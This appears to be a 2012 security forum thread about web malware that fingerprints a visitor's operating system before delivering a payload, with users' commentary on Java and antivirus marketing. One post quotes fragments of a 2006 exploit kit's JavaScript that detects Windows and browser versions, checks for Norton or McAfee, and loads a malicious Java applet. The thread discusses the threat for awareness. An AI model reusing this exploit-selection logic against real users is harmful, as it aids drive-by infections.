Web-based malware determines your OS, then strikes

Thankful · #1 July 11th, 2012, 06:13 PM

http://www.technolog.msnbc.msn.com/t...strikes-876194

m00nbl00d · #2 July 11th, 2012, 06:25 PM

Java... where are you?

#3 July 11th, 2012, 07:07 PM

I just want to see a Java-based remote access trojan try to hide itself. Kind of like a rhinoceros trying to hide in your front yard.

Quote:

With more malware attacks on Apple's OS in the past year, and ongoing strikes against Windows-based systems, "although the amount of malware written for different operating systems can vary, it's becoming increasingly hard to argue on any OS that it's safe to surf the Web without anti-virus protection," Cluley wrote. And it's hard to argue with that.

LOL. "Buy it! Buy it or the malware will get you!" Lovely hype there from Sophos, and lovely of the columnist to just swallow it up.

Rmus · #4 July 11th, 2012, 07:23 PM

Quote:

Web-based malware determines your OS, then strikes

The payload? "Once it has found out which operating system you are running,
the Java class file will download the appropriate flavor of malware,

More than six years ago, a similar trick determined the version of Windows and IE, and then served up the appropriate exploit.

Here is some of the code from an exploit in February, 2006:

Code:

// launching exploit which number is depends on Windows and IE versions
function Get_Win_Version(IE_vers)
   
     if (IE_vers.indexOf('Windows 95') != -1) return "95"
     else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
     else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IE_vers.indexOf('Windows 98') != -1) return "98"
     else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
     else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

For Example, if the user was running Win2K and IE, three exploits were possible:

Code:

 case "2K":
   if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
  {  ExploitNumber=1;  }    
           else     // if JVM = 5.0.3810.0 or higher
            
  if ((fNortonAV==0)&&(fMcAfee==0))
 { ExploitNumber=3; } 
     else
     { ExploitNumber=2; }

If Exploit (Case) 1 was found to be appropriate, it launched a Java exploit:

Code:

case  1:
      Trojan_Path=Trojan_Path+"MS03-11";
      ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar"

And so it goes...

----
rich

#5 July 11th, 2012, 08:27 PM

Determining which version of WIndows is used (or which browser) is common enough that I've personally encountered it ITW. Last time IIRC was with a fake antivirus site, which installed different versions depending on whether you were using IE 6, 7, or 8.

xxJackxx · #6 July 12th, 2012, 10:32 AM

Quote:

Originally Posted by m00nbl00d

Java... where are you?

Not on any of my machines.

Hungry Man · #7 July 12th, 2012, 11:35 AM

Pretty cool except:

1) I don't have Java installed

2) If I were to install Java it would be sandboxed in a heartbeat

It also uses the SET

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search